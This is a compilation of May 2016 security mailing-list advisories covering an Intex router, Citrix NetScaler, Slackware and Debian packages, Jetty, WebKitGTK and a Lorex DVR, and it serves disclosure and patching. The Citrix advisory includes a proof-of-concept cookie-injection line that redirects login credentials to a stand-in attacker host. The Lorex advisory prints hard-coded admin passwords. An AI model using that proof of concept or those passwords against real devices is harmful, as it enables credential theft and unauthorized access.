Multiple Vulnerabilities in Intex Wireless N150 Easy Setup Router
Intex Wireless N150 Easy Setup Router Vulnerabilities 1. Overview Intex Wireless N150 Easy Setup Router, firmware version: V5.07.51_en_INX01, uses default credentials, vulnerable to cross-site request forgery, clear text Transmission of Sensitive Information and other attacks. 2. Vulnerabilities 1. Credentials Management 2. Clear text Transmission of Sensitive Information 3. Auto Complete is enabled 4. Cross-Site Request Forgery 5. Improper Neutralization of Input during Web Page Generation 3. Vulnerabilities Description The purpose of this paper is to outline the security measures being taken by Intex to prevent such attacks in their home routing products, what those security measures accomplish, and where they fall short. Following are the details of the vulnerabilities that we find during the security assessment. (1) Credentials Management Intex uses a default password of admin for the admin account. A local area network attacker can gain privileged access to the web management interface or leverage default credentials in remote attacks such as cross-site request forgery. (2) Cleartext Transmission of Sensitive Information IT transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors. (3) Auto Complete is enabled The Web form contains passwords or other sensitive text fields for which the browser auto-complete feature is enabled. Auto-complete stores completed form field and passwords locally in the browser, so that these fields are filled automatically when the user visits the site again. Sensitive data and passwords can be stolen if the user's system is compromised. Screenshot: https://www.dropbox.com/s/3hhdyp6iisw1kg6/1.png?dl=0 (4) Cross-Site Request Forgery (CSRF) Intex contain global cross-site request forgery (CSRF) vulnerability. An attacker can perform actions with the same permissions as a victim user, provided the victim has an active session and is induced to trigger the malicious request. Note that in combination with default credentials, an attacker can establish an active session as part of an attack and therefore would not require a victim to be logged in. Screenshot:https://www.dropbox.com/s/rh5b925ua0g66s8/2.png?dl=0 (5) Improper Neutralization of Input during Web Page Generation Router does not properly sanitize the Input values. This allows a malicious user to inject arbitrary JavaScript. It results in a failure of the Web page to properly display content and corrupts the administrative interface. Screenshot:1. https://www.dropbox.com/s/civcjng1tq0bh9v/3.png?dl=0 2. https://www.dropbox.com/s/civcjng1tq0bh9v/3.png?dl=0 4. Impact: An attacker can obtain credentials, configuration information and gain complete control of affected devices. 5. Solutions Until these vulnerabilities are addressed by the company, users should consider the following workarounds. a) Restrict access and use strong passwords As a general good security practice, only allow trusted hosts to connect to the LAN. Implement strong passwords for WiFi and for the web management interface. Strong passwords can help to prevent blind guessing attempts that would establish sessions for CSRF attacks. LAN hosts should not browse the Internet while the web management interface has an active session in a browser tab.
[CVE-2016-4945] Login Form Hijacking Vulnerability in Citrix NetScaler Gateway
PERSICON Security Advisory === Title: Login Form Hijacking vulnerability Product: Citrix Netscaler Vulnerable Version: 11.0 Build 64.35 Fixed Version: 11.0 Build 66.11 CVE-ID: CVE-2016-4945 Impact: medium found: 2015-04-07 by: Dr. Daniel Schliebnerhttp://www.persicon.com === Vendor Description: --- "Citrix (NASDAQ:CTXS) aims to power a world where people, organizations and things are securely connected and accessible to make the extraordinary possible. Its technology makes the world's apps and data secure and easy to access, empowering people to work anywhere and at any time. Citrix provides a complete and integrated portfolio of Workspace-as-a-Service, application delivery, virtualization, mobility, network delivery and file sharing solutions that enables IT to ensure critical systems are securely available to users via the cloud or on-premise and across any device or platform. With annual revenue in 2015 of $3.28 billion, Citrix solutions are in use by more than 400,000 organizations and over 100 million users globally." (https://www.citrix.com/about.html) Vulnerability Description: -- The login page of the Citrix Netscaler Gateway web frontend is vulnerable to a DOM-based Cross-Site-Scripting (XSS) vulnerability due to improper sanitization of the content of the "NSC_TMAC" cookie. The vulnerability is located in the file /vpn/js/gateway_login_form_view.js in which the the cookie's content is - if set - written to the DOM via JavaScript. This is done in the following excerpt: var cookie_action = ns_getcookie("NSC_TMAC"); var action_url= '/cgi/login'; if (cookie_action) { action_url = cookie_action; UnsetCookie("NSC_TMAC"); This vulnerability can be exploited by an unauthorized remote attacker by forging the destination address of the login formular in order to receive login credentials of a victim. This can be achieved by for example using another XSS vulnerability on the companies web page. Proof of concept: - Assume this vulnerability resides on https://my-foobar-company.com/vpn/. Assume further, an attacker is able to set a cookie on a victims client via some other attack vector like, e.g., another XSS vulnerability. The attacker needs to first (e.g. by XSS) execute the following code on the client: document.cookie='NSC_TMAC=https://attack.ers/receive/;' + ' domain=.my-foobar-company.com'; window.location.href='https://my-foobar-company.com/vpn/' As a consequence, the Netscaler Gateway login formular has the url "https://attack.ers/receive/; as the value in its "action" attribute and hence a victim will sent its credentials to the attackers host when submitting the formular. Vulnerable / tested versions: - Citrix Netscaler 11.0 Build 65.31 Citrix Netscaler 11.0 Build 64.34 Vendor contact timeline: 2016-04-11: Contacting vendor through sec...@citrix.com 2015-04-11: Vendor response - issue has now the case ID CASE-6597 and will be forwarded for feedback 2016-04-12: Vendor response - issue will be reviewed 2016-04-25: Vendor response - issue will be fixed 2016-05-24: Vendor response - issue is fixed in the upcoming release on 26th May 2016-05-26: Vendor response - issue is fixed in the upcoming release at 5pm PDT on 26th May 2016-05-27: Status update - fix released by vendor 2016-05-27: Coordinated release of the security advisory Solution: - Remove the use of the cookie content or sanitize its content properly before writing it to the DOM. References -- [1] http://support.citrix.com/article/CTX213313 URL --- http://persicon.com/tl_files/advisories/PERSICON-advisory-2016-No-1-citrix.t xt smime.p7s Description: S/MIME cryptographic signature
[slackware-security] php (SSA:2016-148-03)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] php (SSA:2016-148-03) New php packages are available for Slackware 14.0, 14.1, and -current to fix security issues. Here are the details from the Slackware 14.1 ChangeLog: +--+ patches/packages/php-5.6.22-i486-1_slack14.1.txz: Upgraded. This release fixes bugs and security issues. For more information, see: http://php.net/ChangeLog-5.php#5.6.22 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7456 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5093 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5094 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5096 (* Security fix *) +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.6.22-i486-1_slack14.0.txz Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.6.22-x86_64-1_slack14.0.txz Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.6.22-i486-1_slack14.1.txz Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.6.22-x86_64-1_slack14.1.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.22-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.22-x86_64-1.txz MD5 signatures: +-+ Slackware 14.0 package: 32c1de91404285e26621694949522eec php-5.6.22-i486-1_slack14.0.txz Slackware x86_64 14.0 package: 83c69b58d5ce8ca939d2814fbb5d58b2 php-5.6.22-x86_64-1_slack14.0.txz Slackware 14.1 package: 830e6aa4120da72592086c5292a24147 php-5.6.22-i486-1_slack14.1.txz Slackware x86_64 14.1 package: 13024ab60d13e7a07e29736f170267b2 php-5.6.22-x86_64-1_slack14.1.txz Slackware -current package: 76e1f1d5eb9324d5aa33068ee85ae895 n/php-5.6.22-i586-1.txz Slackware x86_64 -current package: 126dacd2be02643c32a815f09ff39f58 n/php-5.6.22-x86_64-1.txz Installation instructions: ++ Upgrade the package as root: # upgradepkg php-5.6.22-i486-1_slack14.1.txz Then, restart Apache httpd: # /etc/rc.d/rc.httpd stop # /etc/rc.d/rc.httpd start +-+ Slackware Linux Security Team http://slackware.com/gpg-key secur...@slackware.com ++ | To leave the slackware-security mailing list: | ++ | Send an email to majord...@slackware.com with this text in the body of | | the email message: | || | unsubscribe slackware-security | || | You will get a confirmation message back containing instructions to| | complete the process. Please do not reply to this email address. | ++ -BEGIN PGP SIGNATURE- Version: GnuPG v1 iEYEARECAAYFAldI1LYACgkQakRjwEAQIjMWTACglcf+DOvhWg+gntlkoxBVKbd8 ZZYAn2B/hRIYwxVevnLtsm1emqAQoNiw =7euT -END PGP SIGNATURE-
[SECURITY] [DSA 3588-1] symfony security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 - - Debian Security Advisory DSA-3588-1 secur...@debian.org https://www.debian.org/security/Luciano Bello May 29, 2016 https://www.debian.org/security/faq - - Package: symfony CVE ID : CVE-2016-1902 CVE-2016-4423 Two vulnerabilities were discovered in Symfony, a PHP framework. CVE-2016-1902 Lander Brandt discovered that the class SecureRandom might generate weak random numbers for cryptographic use under certain settings. If the functions random_bytes() or openssl_random_pseudo_bytes() are not available, the output of SecureRandom should not be consider secure. CVE-2016-4423 Marek Alaksa from Citadelo discovered that it is possible to fill up the session storage space by submitting inexistent large usernames. For the stable distribution (jessie), these problems have been fixed in version 2.3.21+dfsg-4+deb8u3. For the testing distribution (stretch), these problems have been fixed in version 2.8.6+dfsg-1. For the unstable distribution (sid), these problems have been fixed in version 2.8.6+dfsg-1. We recommend that you upgrade your symfony packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJXSyojAAoJEG7C3vaP/jd0fkgP/Rg3MGnU+HOjA3yyqMpG44ui pdYS9uxQHpfqrABEu4BxOOBikJmJOFTVbX6LgKRv7RD8ko0GocEfFVdVyIBg4q37 ym1Kue3pLUYG+ZSDZY3AFTDqOPHdEd1VV0g+NSHOfwQUxB5rZcWbknL1JGiyuZBt vZ6S6t11zEUppBrjlVqFoLZyqaO/6gbOSEl3IYoBJ8nGvpsEb54Hr1xnA0V61BmO LSsnXumvkljlWxfLmdbv6eFZZPeqcTUSTrhSY8HSG4fk1hZYmD5zCcmj9HwFwpDV Ix8qIr2dYqDeP1kXt5vgaJnQnYDcFZswz97vgdc+u+JfpwZzzg5YNLzXtyWMLueb AoTpYkKqyMKt9OYR2LMrR6MApd53SlUMssb6TGBUvrs75fkkInDnn98x7HMOBANf eCZjsaR42tm0H2ydi1mEI3kC2OswLXoVakAw//jYlRoznocQ2J11SvDWZ3ZIVN9N V2AhyotQSD67BYiEkt1n1uln3zoHLxf8rMXRKO1A0CT0TQujyvwucXQ9YrMjcvN9 TbjocikONjdvjrCGD7N5jYh6VFFjyLNgj+erXroGGnFWLq38Ao2+R+7ogMIUl4gX 20ygoVwNeo2Bb+vmUiPOGTmh53GpbuTxMQArpT7/647gwZJhb2CtkzMnDxMBoU2x E4S/jTK1mnD7vScdwaNs =gJF9 -END PGP SIGNATURE-
[slackware-security] libxml2 (SSA:2016-148-01)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] libxml2 (SSA:2016-148-01) New libxml2 packages are available for Slackware 14.0, 14.1, and -current to fix security issues. Here are the details from the Slackware 14.1 ChangeLog: +--+ patches/packages/libxml2-2.9.4-i486-1_slack14.1.txz: Upgraded. This release fixes bugs and security issues: Heap-based buffer underreads due to xmlParseName (CVE-2016-4447). Format string vulnerability (CVE-2016-4448). Inappropriate fetch of entities content (CVE-2016-4449). For more information, see: http://xmlsoft.org/news.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4447 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4448 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4449 (* Security fix *) +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libxml2-2.9.4-i486-1_slack14.0.txz Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libxml2-2.9.4-x86_64-1_slack14.0.txz Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libxml2-2.9.4-i486-1_slack14.1.txz Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libxml2-2.9.4-x86_64-1_slack14.1.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libxml2-2.9.4-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libxml2-2.9.4-x86_64-1.txz MD5 signatures: +-+ Slackware 14.0 package: c498433ae7d6077a9d5245877aa2c06e libxml2-2.9.4-i486-1_slack14.0.txz Slackware x86_64 14.0 package: c92258a87bb30a6cdce2b5428d640bd5 libxml2-2.9.4-x86_64-1_slack14.0.txz Slackware 14.1 package: 2b74b913a164a23ad2da10eebf923e46 libxml2-2.9.4-i486-1_slack14.1.txz Slackware x86_64 14.1 package: e2dee612c7de77822824e43a61414c2c libxml2-2.9.4-x86_64-1_slack14.1.txz Slackware -current package: 98d1ede4a347a49f2ad972ac5339b9e6 l/libxml2-2.9.4-i586-1.txz Slackware x86_64 -current package: c2d5721aac77b74d7e47a2a8a372d47a l/libxml2-2.9.4-x86_64-1.txz Installation instructions: ++ Upgrade the package as root: # upgradepkg libxml2-2.9.4-i486-1_slack14.1.txz +-+ Slackware Linux Security Team http://slackware.com/gpg-key secur...@slackware.com ++ | To leave the slackware-security mailing list: | ++ | Send an email to majord...@slackware.com with this text in the body of | | the email message: | || | unsubscribe slackware-security | || | You will get a confirmation message back containing instructions to| | complete the process. Please do not reply to this email address. | ++ -BEGIN PGP SIGNATURE- Version: GnuPG v1 iEYEARECAAYFAldI1LMACgkQakRjwEAQIjPx0ACfSSTJx0grXawTvgCiMzuoVRCt cgUAnAim/k4Iz6fu7GM8Kcb0nTqWFh0z =GWhy -END PGP SIGNATURE-
[slackware-security] libxslt (SSA:2016-148-02)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] libxslt (SSA:2016-148-02) New libxslt packages are available for Slackware 14.0, 14.1, and -current to fix a security issue. Here are the details from the Slackware 14.1 ChangeLog: +--+ patches/packages/libxslt-1.1.29-i486-1_slack14.1.txz: Upgraded. This release fixes bugs and a security issue: Fix for type confusion in preprocessing attributes (Daniel Veillard). For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7995 (* Security fix *) +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libxslt-1.1.29-i486-1_slack14.0.txz Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libxslt-1.1.29-x86_64-1_slack14.0.txz Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libxslt-1.1.29-i486-1_slack14.1.txz Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libxslt-1.1.29-x86_64-1_slack14.1.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libxslt-1.1.29-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libxslt-1.1.29-x86_64-1.txz MD5 signatures: +-+ Slackware 14.0 package: 9e81aeb7a44f515dc0d0053395faffea libxslt-1.1.29-i486-1_slack14.0.txz Slackware x86_64 14.0 package: c1186870f78d1c71eed0cb10effd561a libxslt-1.1.29-x86_64-1_slack14.0.txz Slackware 14.1 package: 847723b4e9f68c2a2a97869734b4c7c0 libxslt-1.1.29-i486-1_slack14.1.txz Slackware x86_64 14.1 package: 79eed20e9211c68e94c383e929cc6aa0 libxslt-1.1.29-x86_64-1_slack14.1.txz Slackware -current package: 40b33089887fe7c5827d6bf901e1cdbf l/libxslt-1.1.29-i586-1.txz Slackware x86_64 -current package: 088186d11e38075de6e018f8ae6f7471 l/libxslt-1.1.29-x86_64-1.txz Installation instructions: ++ Upgrade the package as root: # upgradepkg libxslt-1.1.29-i486-1_slack14.1.txz +-+ Slackware Linux Security Team http://slackware.com/gpg-key secur...@slackware.com ++ | To leave the slackware-security mailing list: | ++ | Send an email to majord...@slackware.com with this text in the body of | | the email message: | || | unsubscribe slackware-security | || | You will get a confirmation message back containing instructions to| | complete the process. Please do not reply to this email address. | ++ -BEGIN PGP SIGNATURE- Version: GnuPG v1 iEYEARECAAYFAldI1LQACgkQakRjwEAQIjNtPACggz5OAEc2gvKlP5Z4WhLEjSbi BUQAnjGxPxRwaPTRLYq0rALLCaHV+Qpu =xBqf -END PGP SIGNATURE-
[oCERT 2016-001] Jetty path sanitization issues
Description: Jetty is a Java HTTP (Web) server and Servlet container. The Jetty path normalization mechanism suffers of an implementation issue when parsing the request URLs. The path normalization logic implemented in the PathResource class and introduced in Jetty versions 9.3.x can be defeated by requesting malicious URLs containing specific escaped characters. Leveraging on this weakness, a malicious user can gain access to protected resources (e.g. WEB-INF and META-INF folders and their contents) and defeat application filters or other security constraints implemented in the servlet configuration. A workaround to mitigate the issue, using the 'rewrite' module, can alternatively be implemented as follows: $ java -jar ../start.jar --module=rewrite etc/backslashalias.xml or $ java -jar ../start.jar --add-to-startd=rewrite $ java -jar ../start.jar etc/backslashalias.xml Workaround file backslashalias.xml contents: http://www.eclipse.org/jetty/configure_9_3.dtd;> .*\\.* / 404 Affected version: Jetty >= 9.3.0, <= 9.3.8 Fixed version: Jetty >= 9.3.9 Credit: vulnerability reported by Simon Zuckerbraun of Trend Micro Zero Day Initiative CVE: CVE-2016-4800 Timeline: 2016-05-03: vulnerability report received 2016-05-06: contacted maintainer 2016-05-11: patch provided by maintainer 2016-05-13: assigned CVE 2016-05-18: reporter confirms patch 2016-05-20: contacted affected vendors 2016-05-30: advisory release References: http://www.eclipse.org/jetty/download.html Permalink: http://www.ocert.org/advisories/ocert-2016-001.html -- Daniele Bianco Open Source Computer Security Incident Response Teamhttp://www.ocert.org GPG Key 0x9544A497 GPG Key fingerprint = 88A7 43F4 F28F 1B9D 6F2D 4AC5 AE75 822E 9544 A497
WebKitGTK+ Security Advisory WSA-2016-0004
WebKitGTK+ Security Advisory WSA-2016-0004 Date reported : May 30, 2016 Advisory ID: WSA-2016-0004 Advisory URL : http://webkitgtk.org/security/WSA-2016-0004.html CVE identifiers: CVE-2016-1854, CVE-2016-1856, CVE-2016-1857, CVE-2016-1858, CVE-2016-1859. Several vulnerabilities were discovered in WebKitGTK+. CVE-2016-1854 Versions affected: WebKitGTK+ before 2.12.1. Credit to Anonymous working with Trend Micro's Zero Day Initiative. WebKit, as used in Apple iOS before 9.3.2, Safari before 9.1.1, and tvOS before 9.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, a different vulnerability than CVE-2016-1855, CVE-2016-1856, and CVE-2016-1857. CVE-2016-1856 Versions affected: WebKitGTK+ before 2.12.1. Credit to lokihardt working with Trend Micro's Zero Day Initiative. WebKit, as used in Apple iOS before 9.3.2, Safari before 9.1.1, and tvOS before 9.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, a different vulnerability than CVE-2016-1854, CVE-2016-1855, and CVE-2016-1857. CVE-2016-1857 Versions affected: WebKitGTK+ before 2.12.3. Credit to Jeonghoon Shin@A.D.D and Liang Chen, Zhen Feng, wushi of KeenLab, Tencent working with Trend Micro's Zero Day Initiative. WebKit, as used in Apple iOS before 9.3.2, Safari before 9.1.1, and tvOS before 9.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, a different vulnerability than CVE-2016-1854, CVE-2016-1855, and CVE-2016-1856. CVE-2016-1858 Versions affected: WebKitGTK+ before 2.12.0. Credit to Anonymous. WebKit, as used in Apple iOS before 9.3.2, Safari before 9.1.1, and tvOS before 9.2.1, improperly tracks taint attributes, which allows remote attackers to obtain sensitive information via a crafted web site. CVE-2016-1859 Versions affected: WebKitGTK+ before 2.12.1. Credit to Liang Chen, wushi of KeenLab, Tencent working with Trend Micro's Zero Day Initiative. The WebKit Canvas implementation in Apple iOS before 9.3.2, Safari before 9.1.1, and tvOS before 9.2.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site. We recommend updating to the last stable version of WebKitGTK+. It is the best way of ensuring that you are running a safe version of WebKitGTK+. Please check our website for information about the last stable releases. Further information about WebKitGTK+ Security Advisories can be found at: http://webkitgtk.org/security.html The WebKitGTK+ team, May 30, 2016 signature.asc Description: OpenPGP digital signature
[SECURITY] [DSA 3589-1] gdk-pixbuf security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-3589-1 secur...@debian.org https://www.debian.org/security/ Salvatore Bonaccorso May 30, 2016 https://www.debian.org/security/faq - - Package: gdk-pixbuf CVE ID : CVE-2015-7552 CVE-2015-8875 Several vulnerabilities have been discovered in gdk-pixbuf, a toolkit for image loading and pixel buffer manipulation. A remote attacker can take advantage of these flaws to cause a denial-of-service against an application using gdk-pixbuf (application crash), or potentially, to execute arbitrary code with the privileges of the user running the application, if a malformed image is opened. For the stable distribution (jessie), these problems have been fixed in version 2.31.1-2+deb8u5. We recommend that you upgrade your gdk-pixbuf packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJXTIJKAAoJEAVMuPMTQ89EJTMP/0lZOykSdff1w5R2cEb34bmB WzK7oNsvmehDtH59FHdQjmH/KT7RDtQibeAnLPwfDkqtvix76xVthysvdUdloiIT 5kYLc1M8oXomFEkO5/x6Nsfl/LfG7gZbDPWv8hdiAQNVCz6cFqVCVNZdOTPbIkCJ jhiCrHYMp0eRs0k7C0OsbWQfIlLlbaXgre1MZiRSUd+lyb6XyvVNPkWZ540MVCaN 2++1QhfopCsx1Ts1ImG8wiPQohXPFCBgfYmGf1pq0KonMTfigNNf8BccchA6fBRv 4ikP0OOVq0+fPYLCVT4COFHEYa24nshdSRsD0hADd5P3zC5rsS6k9j2NgQIYZPPa p4opW2QAK8dIW/sFdPme7G9+wmhtnini+hHCcoYQsJsXeNU8wc2/HF8X1FjfW0Mz xQ+1gADG3CllFJZi4x6IhWPxOHufnu156nwu2vxO2oCZde9edSpB86IUKxd/l2Br Rra2dBkhj9ZcH3sai4Gx5q5S+oeKCvZoRoT+eVyK5uouGvqPY9urmf8yW8bRhyu0 Fa+bp8KdrYQuyWSCa31Y0vS+gH9JXs6hBTbDLmcUcY8RpcCDgTrdPQdrwfOVQlu7 IpOuPff+zlipYo/E236Mzuf6Aww3x7A98DS2XTX2zoS0CuJyrXcI0abIkWJYvWOb 6TaO9/LyDrmvGv753VM2 =F1mf -END PGP SIGNATURE-
[SECURITY] Lorex ECO DVR Hard coded password
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 1. ADVISORY INFORMATION === Product: Lorex ECO DVR Vendor URL: https://www.lorextechnology.com/ Type: Hard coded password [CWE-259] Date found: 2016-05-04 Date published: 2016-05-30 CVE: - 2. CREDITS == This vulnerability was discovered and researched by Andrew Hofmans. https://www.andrewhofmans.com 3. VERSIONS AFFECTED Vulnerability successfully tested on Lorex LH162400 DVR firmware (V5.2.0-20141008) using Lorex Stratus Client and Lorex ECO Stratus Android app. Vulnerability may be present on other DVRs that are able to be accessed via Lorex's Stratus Client, and Lorex ECO Stratus Android app. Affected DVRs likely include the vendors and versions listed specifically in the code. 4. INTRODUCTION === LOREX provides businesses and consumers with professional-grade DIY video surveillance systems and plug and play wireless video monitoring solutions. (from the vendor's homepage) 5. VULNERABILITY DETAILS Remote access to the device is possible using Lorex's Stratus Client which is downloadable from the vendor. User is prompted for IP, username/password, and port. DVRs are easily identified on a LAN using normal port scanning and enumeration. Default username and password is admin:00 (from manufacturer manual). On first login admin user is prompted to change password. No matter what the password is or what it is changed to the "SuperPassword" grants admin access to the device. The following Proof-of-Concept is found in plaintext in the [installation directory]\new-trunk\js\main.js : function CheckPassword(){}; $(function(){ $("#btn_reboot_ok").click(function(){ var SuperPassword; if(gDvr.nMainType == 0x52530003 || (gDvr.nMainType == 0x52530002 && gDvr.nSubType == 0x50100) || (gDvr.nMainType == 0x5253 && gDvr.nSubType == 0x60300)){ SuperPassword = "130901"; }else{ SuperPassword = "070901"; } if(lgCls.version == "SWANN"){ SuperPassword = "479266"; }else if(lgCls.version == "PROTECTRON"){ SuperPassword = "Ab9842"; } if($("#reboot_input").val() == gVar.passwd || $("#reboot_input").val() == SuperPassword){ MasklayerHide(); $("#reboot_prompt").css("display","none"); CheckPassword(); } 6. RISK === To successfully exploit this vulnerability an attacker must have remote access to the DVR over port 9000. Attacker can use Lorex's Stratus Client and use the hardcoded admin password for specific vendor and model. The vulnerability allows remote attackers full administrative access to the device. 7. SOLUTION === Prevent remote access to port 9000 at the firewall. Segregate DVR from normal LAN to limited access internal LAN segment / VLAN. 8. REPORT TIMELINE == 2016-05-04: Discovery of the vulnerability 2016-05-05: Informed applicable Vendors 2016-05-05: Submitted vulnerability to US-CERT 2016-05-05: Response from US-CERT informing similar vulnerability was previously reported which vendor ignored. No further attempts will be made. 2016-05-16: Response from Swann 2016-05-30: Advisory released -BEGIN PGP SIGNATURE- Version: GnuPG v2 iQIcBAEBCAAGBQJXTIM3AAoJEMRLVTzPHmJSPokQAILGTd4y/q7iyK5w0+uaTh92 0L/FjvEPTs9D1OV82EWjskjzGUKi85R+irG5JYm2TP67km9LSDGu0+4zUPBHP+I9 CCmXgs4ZidW38lhkuauggZaBwUcaED+Ws8yUTqHeaj3q1E9X2UFKbalxbwHE0mI0 6QouLMrKGL8n/qRJfRfp6i7oAeyxrMHC2Aqsd98V5OGeC9/xCQlhMPwTxLCb/P5p M5qQH5uaxb552KugUodwVhad+qnH4BTvs43pzEl7F9IekmPILqfRNm9I+c3IToIz E8nRlTHJumlhkj35McWp63d5UWvHseFpK36Ej37F5fBFb5QQHSISpqzp3g1X1zTB a4ZSGBE6sgYwfi1auw+LglC0MVDz7Opi1jsogqwHRfvEqNKE7R1yhlzMt1hjEFP3 6MqhVS9itr1VjuuS00tjBIEAZ3bJ1r7YF/nUmlzq9NdoD9AEkIOC6+ahybURmJDv UN1d1t+koHtouVISzWzcRmQw3zID1HxEg55uPnmxuz0Q0fuYUdHAVq7kzMJXJwX5 FpUhYePnYfXO8C3dUnxfHEhb3Fp4q03f0Kvb/6oI2VO3RoX178dApLXaMOi9Dihv jLwrJOHNfPcn4Q2DnHVoADfQjEQGdt2a4ukvF1EOw/A20ACE1wjEnRG3mGj3NFFR zUhFAVtD+uJ2gPlOCiip =NH0s -END PGP SIGNATURE-